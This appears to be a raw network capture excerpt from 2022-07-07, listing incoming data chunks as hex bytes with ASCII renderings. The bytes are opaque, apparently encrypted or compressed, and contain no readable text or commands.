                                                                                                                                                            2022-07-07 07:51:12 UTC1232INData Raw: 3f 6c 85 10 4a 34 86 08 80 10 1d d4 f7 d1 b6 e5 1b 9a ca f8 73 40 c8 e8 70 19 fd 36 b2 df d4 88 af e4 66 ed 92 43 76 e3 dd 4f 9c 7d 9e 66 87 0d b4 9d 84 97 ee 75 35 ab bf e5 3b 08 2c 42 e3 0f 91 26 6c 96 1d f8 7c c2 53 5c 08 b5 54 bb 1e 7a dd b4 57 cd b8 a9 2d 2f 29 47 f3 e9 ec 0f 86 2c 74 9e f4 14 48 d6 f9 8d fd ca 10 6a 20 34 0d cc 95 13 9f 49 04 c1 e2 09 79 2a 7a 26 45 e7 40 56 df df 5d e8 28 32 a1 30 93 9a 79 e1 f7 bc de ac 31 d5 da 22 34 3f d5 50 1f 12 db f6 6b 77 a0 90 70 f1 24 8d 81 10 ff ff 85 c9 b9 5a 28 de 6d 49 bc e0 bd 1f d2 da 54 8e ab 4e 02 07 49 96 98 00 5f 5a 12 93 38 59 76 66 f5 61 81 25 9a a3 32 3a c1 88 5d 88 1e 61 1b cb ec f4 02 d4 31 8e 0b 08 80 02 77 14 ca 17 23 c0 8f c5 34 fc 52 5e 22 fc c3 88 14 84 f1 01 b6 b7 a5 ce b7 65 7c 47 0d
                                                                                                                                                            Data Ascii: ?lJ4s@p6fCvO}fu5;,B&l|S\TzW-/)G,tHj 4Iy*z&E@V](20y1"4?Pkwp$Z(mITNI_Z8Yvfa%2:]a1w#4R^"e|G
                                                                                                                                                            2022-07-07 07:51:12 UTC1248INData Raw: 6a 2d a3 71 3c d0 0e 8c 12 92 dd 2d c5 05 c3 52 22 00 46 38 05 f6 b2 0e 1d 3b 56 37 76 81 dd 7c 00 03 7c df 82 e0 45 95 d3 94 d3 56 e9 08 13 40 8a ce fd 9c 76 51 b0 df 91 28 a0 a7 03 45 65 c9 df 38 41 d7 64 22 25 24 b7 4a 31 cf 9f ba 9d 3f 00 60 26 26 9e cc 02 6d e3 8c 01 9f b8 76 72 0a b4 26 fe 9d 70 80 9b 05 6e 93 10 d9 df 7f 91 97 ce b6 db 2d 62 43 64 3b 8c 71 c2 2f c1 ad 6e 00 96 a9 0e fd 35 5b 15 02 0b 9d eb 78 ab 2f 43 52 74 58 7e 9d 7c 65 4b fb 95 bd 41 2e 5b e9 53 fc 9f 8c df fd 51 72 20 1e 2d 35 d6 4e 96 7f f3 16 c3 2d 9e 9a 47 4b 91 5b 42 e0 96 a7 2e 70 f5 1a 60 f4 e7 fc 37 e8 4d 0c 4e df d3 59 fa f1 0c 99 b6 9f f2 f4 43 b2 7e 4c 89 66 7c 9e 1a ca d6 35 6a 21 df 83 ef 67 38 fb 54 a2 6b 1f b0 d9 3f 39 20 13 a2 d2 a0 b7 6d d3 80 92 57 ba 5f b8 80
                                                                                                                                                            Data Ascii: j-q<-R"F8;V7v||EV@vQ(Ee8Ad"%$J1?`&&mvr&pn-bCd;q/n5[x/CRtX~|eKA.[SQr -5N-GK[B.p`7MNYC~Lf|5j!g8Tk?9 mW_
                                                                                                                                                            2022-07-07 07:51:12 UTC1264INData Raw: 4d ba bf 9b 85 d1 86 80 89 6a e3 7a 46 21 da 80 5b 71 0d c5 14 0d 39 e2 35 e7 d1 77 24 c1 ce db f3 cc 85 97 f8 e9 6f 0f 59 d8 97 6f ed 7e de 94 a5 cf 9f 61 34 f2 7b a4 b1 5d 31 fe e6 ad cc 3a 26 65 4a 67 c0 fe 34 00 fd 0f 4e 59 b1 54 ab ce 8f dd 7b 6f 8f fe b3 6f da ec b3 18 f8 8c 82 3b ce fd 49 d2 b3 07 55 ba 64 37 d8 7e 70 a4 f4 6c 98 c5 b7 ee 24 84 1f 9f 0b c5 aa 64 a4 f9 05 9d b8 b1 15 f7 8b cd 53 42 7c a4 f1 c5 36 9a db 2b c2 f6 3f 9a a7 1c 4c 5f 69 33 5f 50 bb 27 8e c1 94 e8 63 87 57 21 df e7 99 d4 50 01 e3 4f 8c f7 b2 c0 55 37 ef 6a 0b 59 3a e9 c9 42 fa d4 3e 47 17 68 f0 ec 7a 73 e0 2b f5 79 b0 16 24 fb 19 1e 4c e9 a0 cc 82 6c f7 f1 1d 2e 23 75 5d 58 7d 60 64 ee bc da 57 dd 4d cd 5e ca 38 18 a5 87 a4 87 fc 05 28 ef be 08 03 c4 c3 72 38 7d 1b fb 60
                                                                                                                                                            Data Ascii: MjzF![q95w$oYo~a4{]1:&eJg4NYT{oo;IUd7~pl$dSB|6+?L_i3_P'cW!POU7jY:B>Ghzs+y$Ll.#u]X}`dWM^8(r8}`
                                                                                                                                                            2022-07-07 07:51:12 UTC1280INData Raw: 5b 16 fa 08 45 f7 01 5d e5 11 ef 41 60 da 47 9b 4b c1 2c ed c4 c1 c0 c4 97 13 cc 5b e6 7c b2 a4 4a 92 9a 21 34 c2 37 da 52 c5 23 19 bb 06 12 cc d4 63 90 66 4a b4 88 0e 48 f9 c8 63 05 0f be 6c be 7d 9d f3 ae 80 6f f3 f9 36 df b6 51 d6 e2 99 f6 73 d6 98 7e 3b 39 6d a4 28 00 e3 a5 25 73 45 80 9e 93 7b 3b cf 4d 14 c7 0a 5a 1b d8 5c ff 76 91 4b 31 30 73 4c c7 f7 19 d4 1e 40 78 0f 23 1a 87 0f 73 ea ac e3 50 33 c4 df f4 ef cd b5 ea c0 a0 da d6 2c 8c 3d db 76 b4 45 96 ba 60 f6 e2 90 8c 0c 55 dc 8d e2 2b 79 2e 1d 76 d8 e5 0d 67 71 29 be b0 c2 4e 0f e9 a8 8c 70 a6 47 05 c7 5a 81 a1 b9 40 db 12 79 44 b2 33 58 57 85 24 33 c7 c9 c7 bf 46 ea e7 73 b2 5b c1 5d d4 43 a5 40 9f 28 92 7a f3 53 ac 3d 8a d5 70 95 3f 31 3e f2 b1 fa e8 f7 fa 61 8e 0f f4 82 1b 5e ae f8 0b ac e6
                                                                                                                                                            Data Ascii: [E]A`GK,[|J!47R#cfJHcl}o6Qs~;9m(%sE{;MZ\vK10sL@x#sP3,=vE`U+y.vgq)NpGZ@yD3XW$3Fs[]C@(zS=p?1>a^
                                                                                                                                                            2022-07-07 07:51:12 UTC1296INData Raw: 3b 65 dd a1 ba 25 31 3b 28 87 7e a1 a3 cb 8d b9 5b 70 9e 15 b5 37 79 de b3 07 d6 1a 6b 20 41 de e7 13 97 8f 72 d4 6b a6 5b 71 86 64 25 a9 1e 92 a6 31 db a1 6e 21 07 b6 52 3a 38 56 86 8d 0a 63 5e df d0 f4 7e 08 f3 ec 77 9c 94 18 6d 45 79 89 6a ed f9 74 cb e0 62 c1 1f 07 89 22 e3 c4 2f 9c 60 5e cc 61 15 3f 4f e0 48 da cc 09 0b 12 4c 95 23 22 99 f1 7a 1f fb 60 be 4d 8b 8e f8 d0 d5 5b 1d 2b 47 23 b2 e3 12 39 c8 0e ab ce 7a df 74 99 a2 fb 25 12 06 1f f2 82 57 f3 ea d8 e2 f3 28 b8 e7 41 31 0a 10 60 ad a9 a7 90 86 27 cf 3a 89 56 61 f3 6b fb 67 fb 43 a8 28 ce 16 2c b8 16 08 09 bb 08 61 9a 4b e8 9c 47 bb 1b 90 37 66 ad 87 f5 40 31 35 6d a7 0e b5 29 b6 c7 0f 8c 41 07 a9 2c ff 3f f0 8a 55 66 16 c7 89 ce 34 dc 6d 49 3e 7a 86 4c c4 a9 89 be 64 50 9d 41 5d 78 38 89 3e
                                                                                                                                                            Data Ascii: ;e%1;(~[p7yk Ark[qd%1n!R:8Vc^~wmEyjtb"/`^a?OHL#"z`M[+G#9zt%W(A1`':VakgC(,aKG7f@15m)A,?Uf4mI>zLdPA]x8>
                                                                                                                                                            2022-07-07 07:51:12 UTC1312INData Raw: 16 f6 47 8d a2 cb 23 e1 bb 7c 13 44 89 36 f2 5a 51 a6 ff 2a 94 c3 c4 46 0a c8 bb 6e 06 2f 92 f4 15 37 c5 71 f8 5b 92 f6 79 b8 14 e4 ce e1 7d f9 1d 80 d5 69 ac 01 48 3d 3c 1b c3 2d 12 1c 3d 44 54 1e a1 35 8d ff c8 c0 85 75 88 d3 ba 7c ed 9d 07 7f c9 d0 a3 df 26 2e cc 3e 6e 37 ae 7e 4b 8b 4a 61 95 27 c4 23 13 f3 16 09 8b b1 80 e0 aa fb 7a f8 d1 b7 35 2d 00 cc a4 5c 9f a6 fa 5b f7 ab 6e 82 0b 29 3b 7c 37 a8 82 3b ea b6 eb 03 cf 8b 86 ac 83 dd 53 d9 93 bb d7 ca 63 b7 1e 68 94 18 90 85 7f 38 07 24 84 fb e3 db 6e d1 cc ed 36 ce e8 77 e9 12 1b 55 68 0b c6 42 56 7f 86 25 8f 73 14 bd 9c 0e 8c c3 18 e2 61 ed b4 b7 52 e9 60 20 a2 b0 4a 41 80 4a 77 8a 5e eb 8f 4b ec 56 9c 3c 7e e2 fe aa 8d 30 b6 2b ac de 3c 38 28 3e fd e7 56 1d c3 f8 e3 84 01 95 0c 7b d0 d0 d5 be 0e
                                                                                                                                                            Data Ascii: G#|D6ZQ*Fn/7q[y}iH=<-=DT5u|&.>n7~KJa'#z5-\[n);|7;Sch8$n6wUhBV%saR` JAJw^KV<~0+<8(>V{
                                                                                                                                                            2022-07-07 07:51:12 UTC1328INData Raw: f3 cf c1 42 ce 5f 59 bd 2f 17 0d 28 a0 e9 1d 2d e7 be 0d a2 15 f0 69 58 35 90 28 8d 3f a3 25 f1 d1 24 de 70 3c 4a 6d 07 41 06 fe e2 81 5e ca 08 7c 42 40 a5 fc c6 04 17 24 51 f1 b4 6f dc 6e 54 8b e1 68 25 77 82 1d bb 67 e9 d0 c0 e3 a2 97 ca fc 1b 12 9a e1 d8 ca 5a 13 16 32 8d 49 cd 7a bf 97 b9 a1 5f e7 3d 3a 99 8c bc dd 3c c7 56 39 50 ec b1 52 2d 92 d0 f1 dd 25 16 af 90 c7 1a 73 bc 3f 0c 24 07 c4 bf 9c 78 21 4b 53 b9 35 e1 f3 e2 6e 5e 31 ec ea 95 10 08 84 75 d4 97 f0 75 d4 89 20 69 6e 25 a3 25 d7 0f 74 6b 9a 4d 91 02 86 ea e9 49 6d 8f b2 55 7e 47 43 48 dd b4 c3 e3 14 47 7f e7 2b 2f 92 07 08 0b c8 6f 22 f0 47 b7 19 0b f0 05 7b a3 49 a2 0e 07 f6 55 cb 5a bf 86 8a e3 a4 21 f7 3a 09 25 62 37 cf 46 4a 4f 02 a2 90 3a 93 d6 a1 88 ba 5e e2 8a 8a 34 d8 07 bb 0b 68
                                                                                                                                                            Data Ascii: B_Y/(-iX5(?%$p<JmA^|B@$QonTh%wgZ2Iz_=:<V9PR-%s?$x!KS5n^1uu in%%tkMImU~GCHG+/o"G{IUZ!:%b7FJO:^4h
                                                                                                                                                            2022-07-07 07:51:12 UTC1344INData Raw: 57 0b 88 fa ea 03 9b 9f 31 c6 23 6d 16 05 93 cd 7e 24 10 54 6f 4e dd 66 76 dd 1d 66 81 3f 3f 8c 02 dc 9a e0 61 03 a6 82 12 8a 69 c1 48 8d d7 bd 50 6d e3 82 80 27 3b 20 d7 db f5 fb 13 31 d1 ec 33 18 0f ad de 83 f2 9e 2d 54 cb 3b 8f 4b ce b4 7e 32 66 22 79 17 6a 58 0d 7d 65 4b c3 66 47 d4 02 9d 18 ff 25 d3 4e aa b5 51 de 6c 54 71 8e ad 74 09 23 c7 c9 e9 92 50 76 ad b6 c4 22 ed 2d c0 3f ce b1 4b ef 6f 78 3a f7 69 af 69 f3 88 6f b8 f5 f4 86 bc e3 b5 7b 77 df 2c 42 1f 1c 20 cf b9 c1 7c 43 13 50 9e 6c 25 58 76 88 9a c4 0e fc e4 e6 97 71 d1 2a a7 19 6f 0a c8 85 77 20 9e 3c 37 a2 46 ae d7 44 ce 59 b0 23 e9 62 f0 06 f8 77 6a 75 1f 66 27 d3 fd fc 9e 7c 22 f3 d5 c0 57 c4 71 a6 a9 6a 7e 66 55 34 79 be 91 14 ea 54 13 a3 f7 74 42 76 a9 5c 85 71 2b c0 8a af fe d2 6d d8
                                                                                                                                                            Data Ascii: W1#m~$ToNfvf??aiHPm'; 13-T;K~2f"yjX}eKfG%NQlTqt#Pv"-?Kox:iio{w,B |CPl%Xvq*ow <7FDY#bwjuf'|"Wqj~fU4yTtBv\q+m
                                                                                                                                                            2022-07-07 07:51:12 UTC1360INData Raw: d6 13 cb e6 a6 91 a4 95 61 9b ce 15 51 f9 bd fb a8 10 32 95 36 02 df 86 a8 b0 61 26 d2 d4 df eb a4 30 02 ac 7b fb 46 05 fc 2e b0 3c c7 e5 3c e7 9b 88 25 fa 89 c4 9e 48 d5 f5 d4 f4 f0 b5 be 2c 1a 1b b0 9e 70 b9 f0 cc b7 ef ae 63 e9 8b ff b7 e2 14 a5 ea 66 97 a4 14 d5 ec fe 63 9e 27 39 15 f2 0e 04 69 24 3a e4 22 b6 72 b7 c1 08 74 40 83 a2 8a e0 ce ae 4b c4 57 d3 c3 b6 77 28 2e 37 0b f2 d4 2e 41 db 96 06 2e 22 f8 8b d6 7c 3e 49 10 c9 ae 29 6d be 8b 75 50 da 75 d6 38 77 e5 ba a2 d6 f5 54 ec 81 ad 2a 56 fb 8a 18 85 d6 eb 3a d9 8f 0e f7 41 f3 b5 07 03 2c 94 b9 19 78 db 29 ec 76 92 01 b5 9a 68 7f 4c f1 b5 27 7c 3a ec 71 6e 9f 91 29 51 c2 af a4 46 c7 75 60 fb b5 2e 4a 17 0b 63 5e fd ee 5d 5a 69 c6 aa 2f 5a d5 f7 5e f5 9f 1f b2 ee 4d ae e1 b0 38 5b 0a 86 09 ea 4c
                                                                                                                                                            Data Ascii: aQ26a&0{F.<<%H,pcfc'9i$:"rt@KWw(.7.A."|>I)muPu8wT*V:A,x)vhL'|:qn)QFu`.Jc^]Zi/Z^M8[L
                                                                                                                                                            2022-07-07 07:51:12 UTC1376INData Raw: 19 a2 73 74 33 bb d6 c3 3c cb 6d 94 ae 70 39 9e ee f6 1c 33 75 70 3b 02 01 8b 93 d4 fa 75 d5 5e 5b dd 96 c0 f0 ac e2 8a f4 9c 05 2d c9 59 a8 cc 47 04 d1 17 30 30 60 7b 90 10 41 3b 74 00 b2 aa a6 00 3a 9e b5 cb 79 28 4e 1c b7 e7 10 8c c1 1b 86 34 79 4d 4e ec 56 e1 85 c0 d7 af f9 e4 a6 3f 5e d5 49 83 c2 52 43 89 c7 1b 9e 97 7d ac 66 77 37 e4 88 5e 4f a3 bd c9 8c f9 de d8 be d8 bd cf 67 d6 c9 52 17 03 04 da 9b 81 27 1e 22 22 b8 9c a7 20 ca 2c b6 43 b9 b6 d8 88 24 b8 40 37 5f 73 68 b9 5e 45 f1 ab 7a e0 69 10 23 a2 ca 3a c9 3a 54 c7 15 87 1d e0 95 2d 29 9d 24 74 1d 8b e1 29 19 c3 8a 28 5c d4 44 31 89 ea e5 c4 26 10 ad d3 73 41 ef a2 fa 36 cc d5 54 d3 ef 46 65 07 d1 c6 54 54 19 a0 a2 17 95 74 0c 1e 04 8f 57 10 8a 31 75 c3 3e 66 dd 23 5f 17 c9 ff 98 3e 58 24 21
                                                                                                                                                            Data Ascii: st3<mp93up;u^[-YG00`{A;t:y(N4yMNV?^IRC}fw7^OgR'"" ,C$@7_sh^Ezi#::T-)$t)(\D1&sA6TFeTTtW1u>f#_>X$!
                                                                                                                                                            2022-07-07 07:51:12 UTC1379INData Raw: 6d a1 e8 ed 72 fa e0 ed e2 7f 04 75 f6 66 e4 ce 28 f1 7f 36 e1 76 22 7c 2b 03 40 72 8e 08 fc 93 7a 48 fc 60 fe 4b 4a c7 74 91 61 dc f1 04 2b 90 cc eb cb bd 52 66 fb 94 de a6 f7 bd 8f 67 0f 60 c1 78 e7 17 18 9d 81 64 ba 91 ae e8 94 b8 50 a2 3b 2b ef 93 03 4d 43 3a 87 7f 02 4b fb 73 87 f9 b4 02 87 68 f9 28 af 3e da e3 ad c3 6e 17 c4 fd 75 5b 03 80 b5 31 60 e0 27 7a ee 0f 52 a1 7d 7a 99 6f 65 92 b4 dd e5 09 bd 9c ba 3e a1 23 69 89 65 e8 a3 38 0b 5c 39 02 b8 3f 06 ca 6e d0 55 8b 12 e2 53 79 4f 5f 89 da 30 79 58 21 96 f0 00 16 7f ca 8c 9e 39 ce 86 cf ed 73 11 04 07 df 2d 32 6d b1 3f 03 07 d3 e6 1f d3 6c 36 66 1a 68 5e ca 90 10 22 24 92 60 2e ad 5f fd 0e 15 a3 02 37 37 75 bf 2c 1f 91 f9 20 ff 64 82 48 79 78 ee 19 01 13 7d 81 e0 eb c1 6b 50 a4 9a d0 fb 78 84 57
                                                                                                                                                            Data Ascii: mruf(6v"|+@rzH`KJta+Rfg`xdP;+MC:Ksh(>nu[1`'zR}zoe>#ie8\9?nUSyO_0yX!9s-2m?l6fh^"$`._77u, dHyx}kPxW
                                                                                                                                                            2022-07-07 07:51:12 UTC1395INData Raw: fe 99 0d 8d 8c 83 d6 9c 1a b0 21 6d 1b b4 f5 cb 80 90 d7 fe 64 2d 66 3e de 70 3b e4 79 c0 ed 82 6c 5c fa 6b 8f 0b 75 eb 74 96 81 6c f6 6b 00 57 49 66 df 89 e9 ec ad 6c fb be bb ee f1 35 3d 9d 7a 4d ab bd d7 b1 9f 2d d4 6f 4d 0c c3 6e 70 d7 1b 73 ba 97 3a 2a 38 da bb ac 9b 50 55 78 c2 35 ab 8c 61 9b 4e 95 fa 8f 0a 46 6a 55 1e 11 8f a8 99 c5 77 b8 12 70 7e 86 a4 2b 52 8a 37 b9 6e 1f 2b 55 e1 1c c4 5b 40 98 ba d0 f7 88 b3 d0 70 3c ff 64 69 46 2c 7d ac 68 60 1a 5f 84 85 60 03 2a 48 cb 01 4a f6 c4 86 ec 55 8b 8a 57 8b 44 9c 75 15 2a 39 7e fb 12 f1 17 08 12 05 51 ab 13 b9 20 17 15 df ad 83 74 a2 80 53 43 20 38 ac cd 89 7c 68 11 ec b9 cf ac 9c 62 d4 21 12 fc 2c 18 4d 62 2b ae 09 e9 10 b6 0c ae 4e ca 94 11 ab d2 3c e0 ec c0 5d 80 7a f9 b2 83 16 cd e6 fa 57 7c ab
                                                                                                                                                            Data Ascii: !md-f>p;yl\kutlkWIfl5=zM-oMnps:*8PUx5aNFjUwp~+R7n+U[@p<diF,}h`_`*HJUWDu*9~Q tSC 8|hb!,Mb+N<]zW|
                                                                                                                                                            2022-07-07 07:51:12 UTC1411INData Raw: 95 c4 41 0e d7 52 fe d2 63 09 47 7e dc 0d 75 c4 36 e6 ba ef 25 9c fc 84 0d a9 f5 5d 66 e8 e2 0d 8f 3f ac 19 15 ff fe 92 8e 86 8e 9a bb 76 77 b8 96 a6 20 b7 7a 1a dc 27 62 91 de a2 d7 be 83 de 45 5c 62 74 7b dd d5 55 60 27 f4 6e 95 75 bf c6 45 a9 14 4b 89 84 ee 58 58 fc dd 26 d2 e7 00 3b 13 87 03 7e f1 f2 0f 2d 5d c6 52 b4 3e 48 f9 f8 41 13 cc 6a 64 b9 a2 83 86 8b 11 29 3c e6 ea f8 55 0f 5d c1 1a 84 4e c1 83 4b 50 a7 7f 44 8c 59 91 c7 fc eb 49 e0 a3 e4 a3 95 8d b7 52 af 3a ce 84 6c c7 ad 8d 90 b3 2b d6 a4 db d2 b6 cf 3f 18 e3 0d d2 b7 a0 b4 f3 81 7e ef 08 a1 70 4d c0 1f b0 8e 7f b5 ad fd 04 8b 9c bd 6f a0 76 c3 2f 15 20 09 13 09 0f df 52 a4 69 d1 82 8f 6b 5d 5e 45 73 57 5b ac 99 ec fa 4f cd a2 e7 40 b7 9f 51 e5 77 6b 7d 72 fa 5f f3 96 ad 6e 3e 59 55 63 70
                                                                                                                                                            Data Ascii: ARcG~u6%]f?vw z'bE\bt{U`'nuEKXX&;~-]R>HAjd)<U]NKPDYIR:l+?~pMov/ Rik]^EsW[O@Qwk}r_n>YUcp
                                                                                                                                                            2022-07-07 07:51:12 UTC1427INData Raw: 12 6d 1d cf 4c e7 ea 9a fa 9b fc 09 a8 38 96 81 f4 55 6e a1 e4 68 3b cd 22 88 c0 d2 8c 54 7f 61 24 02 cd 53 48 c2 54 03 4d e5 a2 a0 14 8c 91 d1 8d b1 08 fa ef 56 1a 34 98 63 2a 41 74 2f 2e 9a 73 c7 a2 b6 5d a5 e0 95 b4 f3 6d fc 92 a4 9d 52 78 fd 0e 13 24 47 ee 97 02 9d 64 2c 16 2a 59 6b 3d 4d 31 3f 40 41 77 e7 e9 2d 01 e8 17 7a 8c 19 2e 57 2c 36 37 79 a7 72 55 e0 42 f5 ab c0 6d 59 9a dd a1 82 3c 63 f9 bc fd b0 96 89 37 4c d8 35 03 9f 10 e2 0b 41 03 fe 36 b1 78 88 64 9a 90 40 09 80 cc a3 a9 a1 e5 a4 5d 87 fb 97 95 78 a9 b0 e2 3b 2b 31 1e 48 c0 61 f3 86 04 f9 f2 b1 1b 11 0b e2 f0 b9 3e bb dd e5 07 50 a2 c5 51 11 71 8c 1a 88 fa 8c 71 16 0a ca ad 63 3c 03 2f b0 bf 57 e1 55 81 bc 5e 85 6e a9 77 81 40 59 10 7a 35 7d 52 3b 1e fa 00 5b 00 fc d9 f5 04 6e 2e 4d c0
                                                                                                                                                            Data Ascii: mL8Unh;"Ta$SHTMV4c*At/.s]mRx$Gd,*Yk=M1?@Aw-z.W,67yrUBmY<c7L5A6xd@]x;+1Ha>PQqqc</WU^nw@Yz5}R;[n.M
                                                                                                                                                            2022-07-07 07:51:12 UTC1443INData Raw: 2c 71 1f ef 85 58 bd 53 35 15 7e 9b 6d ca 32 7f ee 6a db cb 7d 10 88 ba 34 d0 45 72 f1 2e 55 34 2a a5 33 17 b0 2e 20 c6 78 7e 0d 27 83 ee 6e 3b 55 67 ab ed 47 ed f5 dc b0 c3 31 47 c7 2f 9d 59 a1 a1 54 07 d0 8c 82 09 0d 94 af b1 34 99 f4 d8 7d b4 b4 da 35 26 71 16 de 93 7e 28 88 d3 91 59 19 b0 ca 15 52 61 6e a7 d8 5c 8f 62 d2 ba f6 50 cf d5 9b d6 5b 64 e5 ae 62 36 6a 8c 7d ed 42 69 39 b8 27 1e c1 ee c7 8c 5c ce 19 48 cb 7a ca c6 9d 55 c9 20 0b 9d 0f dc fe 7f 27 12 fb 67 61 5f e3 91 32 34 e5 34 6d d3 60 c3 58 9c 9c 3a d8 2e bc 1a 27 db d9 0c c1 1d 0f 49 ee 68 63 73 f4 fc 8c 64 78 8b 5f 5b ce 74 f2 ab a8 13 e6 01 20 ba da 20 fb 6f 85 3b 65 f6 e2 51 cd 48 ee c2 70 d4 2b c8 5b 86 86 22 59 ac 25 5c 4f f5 65 3e 9d 24 4b 80 f4 2e e1 58 c8 57 fb 94 46 df f1 0c 0c
                                                                                                                                                            Data Ascii: ,qXS5~m2j}4Er.U4*3. x~'n;UgG1G/YT4}5&q~(YRan\bP[db6j}Bi9'\HzU 'ga_244m`X:.'Ihcsdx_[t o;eQHp+["Y%\Oe>$K.XWF
                                                                                                                                                            2022-07-07 07:51:12 UTC1459INData Raw: a2 e9 ff c3 9e e8 35 ca c2 a8 90 ec 2d d6 5b 2b 6f df b6 61 d7 51 8b 99 aa bf df 25 a6 b9 0a 02 0b e4 da a6 5a 80 67 a3 7c 68 2d f6 ae 28 96 e6 6f 06 d7 8c 0a a2 86 47 24 87 b5 f6 b3 d7 0d a8 1b 1f 50 6d 31 24 62 70 90 2e 0e a3 7e 0e 8a cd aa 6f 03 af 38 47 57 4d ff eb 5c 6d 21 9c b3 3c bc c9 b3 65 c6 26 8c 23 e1 50 1c f0 9b 4b ab bb 5b 74 c3 9d 91 f3 d4 de 18 c2 46 f6 94 97 b8 ab 8d a7 c7 4e bc 01 71 8e 3f dc 09 e9 23 b1 0b 20 f5 ff bc 33 43 f4 36 e2 dd 19 05 5d d0 42 de 06 6a 97 a7 dc af 91 e8 ff 57 c8 aa d1 21 c8 90 90 c0 a7 92 26 6d cd ec 2d f2 19 bc 88 09 8e b2 6f 4f b4 cc e3 15 9a bd 06 f3 87 21 b3 a5 47 66 15 37 3a 85 29 09 b7 43 2d 78 c7 fc 34 44 70 7f cc f4 a1 62 b2 83 e4 85 b6 dc e0 b7 fc f6 db 22 b9 56 e7 ab e2 9d e7 ea fe c1 69 a3 b1 3e c3 8f
                                                                                                                                                            Data Ascii: 5-[+oaQ%Zg|h-(oG$Pm1$bp.~o8GWM\m!<e&#PK[tFNq?# 3C6]BjW!&m-oO!Gf7:)C-x4Dpb"Vi>
                                                                                                                                                            2022-07-07 07:51:12 UTC1475INData Raw: 76 cc 37 8a 9d 9b 3e b5 71 28 1d 86 93 d8 2f 92 55 8f d0 94 4e 92 10 73 3e 0c 38 d8 4a 4a d1 66 8d 2b 86 aa d8 09 f7 60 31 55 fb f6 75 6c 23 66 de 9e 1f 75 76 08 b2 9a eb da b5 66 9a a4 89 c6 c8 0f 13 5e a4 67 27 b6 50 9b 69 49 40 35 7b fc ac 6d 9b 90 d5 00 cd fe a4 3d b5 2d 0d ab 0d 85 3a c4 e5 0c 72 b1 b0 40 46 d6 4a be e3 bd 05 bf 16 fc f4 03 34 9d 57 3f 9b 28 ae 66 c7 06 a8 67 2c 9d b7 f8 a4 ca 48 02 56 5b e4 25 73 ad 47 a5 7c 98 62 4a 20 bc bb 6f 8a 4f 72 eb 23 ca 61 50 32 68 b7 43 9a 8e 9e 8f 4f f2 ed 9e 44 25 ce c1 9a b1 33 05 e4 29 4c 87 4b 41 0a 5a 2c 78 75 36 ca 3f 19 fb 66 ae 3c e5 ca d0 15 5c 31 70 9e 28 d1 5c eb 34 d7 ac ec 7d 90 17 cf 32 05 9c 61 bd df 96 c8 96 0a 25 62 71 57 3b 38 1b ce bb ce 49 c3 e8 52 ad b6 18 e1 ed a7 d2 ce 7c 31 57 39
                                                                                                                                                            Data Ascii: v7>q(/UNs>8JJf+`1Uul#fuvf^g'PiI@5{m=-:r@FJ4W?(fg,HV[%sG|bJ oOr#aP2hCOD%3)LKAZ,xu6?f<\1p(\4}2a%bqW;8IR|1W9
                                                                                                                                                            2022-07-07 07:51:12 UTC1491INData Raw: 08 e8 73 fa 05 35 9a de 3a 4b 0f a0 4e 7b 05 2a 64 e9 ab d4 9f cf 24 92 4c 35 fa 22 ab 12 94 08 17 f9 81 6a 72 3e 0e d9 30 6d 44 1c 61 a7 92 73 c8 65 61 c3 1b 28 ab ae 93 41 10 1f fd f9 5b 4a fc ea ae a1 73 31 77 4e d2 2b bf 9d 2e c3 5a d4 88 03 f5 10 5b 42 41 02 23 a9 e7 fc 86 49 2d ae b1 56 ea 6d ea 94 3e bd bf 60 67 32 4b dd 46 24 d1 04 26 c0 13 e0 aa 26 e3 cf d0 46 eb 82 8a 34 ad ef 21 7b 8a ce 0b df 4d 40 7c 2e ac 26 ee f8 ff 29 9b 81 fb 33 1f 14 cc 6d 58 40 57 c5 84 62 2b 68 99 a3 c1 71 c1 a2 a9 a2 2d 5d 49 eb f1 c0 8c 43 01 b5 b3 ef 7e b6 eb 8f 49 ec 7d 28 32 5a ec 8e c7 3e ba 8d 8f ec 10 70 e5 e2 7d ef 43 b0 16 41 56 2c ff 3c 5e b3 0c ac a4 c0 ec ab 24 25 69 45 3f 26 2e aa b9 bf b0 da c6 d1 3e c7 c3 0c 7f 43 e5 ba a2 4f 57 a2 6b ae 78 1e 73 ec a4
                                                                                                                                                            Data Ascii: s5:KN{*d$L5"jr>0mDasea(A[Js1wN+.Z[BA#I-Vm>`g2KF$&&F4!{M@|.&)3mX@Wb+hq-]IC~I}(2Z>p}CAV,<^$%iE?&.>COWkxs
                                                                                                                                                            2022-07-07 07:51:12 UTC1507INData Raw: 4e 97 6e cb bb c5 13 23 34 97 84 f1 33 4f 11 7c 89 97 d4 22 c6 a8 50 28 6b 64 e9 26 7b c6 ac f8 91 c1 c2 7e 09 9c 40 cf c3 f4 5b 57 16 0d 80 fa ee 00 1b 52 cd a2 a3 70 5b d0 99 52 0c 9f 28 c7 66 88 53 0e d0 74 b7 d1 39 21 51 f4 10 7a f6 61 f0 5d cf 48 a5 e1 86 f2 d1 1a b4 8f d4 36 47 13 e5 e9 91 30 e0 53 a6 ba 04 29 fd fc 48 0e 3a db 65 4f 3e d3 87 b4 62 1a 1c 9b 48 e7 31 e7 43 03 55 c8 03 c6 75 3e a7 28 66 ff 62 b8 c1 e8 26 33 17 05 95 bc dc 25 27 1f 0a 19 59 51 66 a1 6e e4 ef 14 60 b7 7c 0c c2 ed c8 ed c6 0a a2 07 01 91 bb 53 ba 20 7e 0c 3a 79 c4 3b 03 ff ef 26 65 84 b0 5e 2c bf a7 cb 9d cc 1b 10 94 12 ae c1 f9 f6 34 06 b2 a6 cf 24 81 65 45 d7 0b 43 1a 56 77 98 79 0c 64 5d 1c cf f5 2b 95 e2 c5 0c 5c 7b 4c 7c 2e 0e ec e3 9d 4a 71 75 2c 5e 03 75 2e 67 1c
                                                                                                                                                            Data Ascii: Nn#43O|"P(kd&{~@[WRp[R(fSt9!Qza]H6G0S)H:eO>bH1CUu>(fb&3%'YQfn`|S ~:y;&e^,4$eECVwyd]+\{L|.Jqu,^u.g
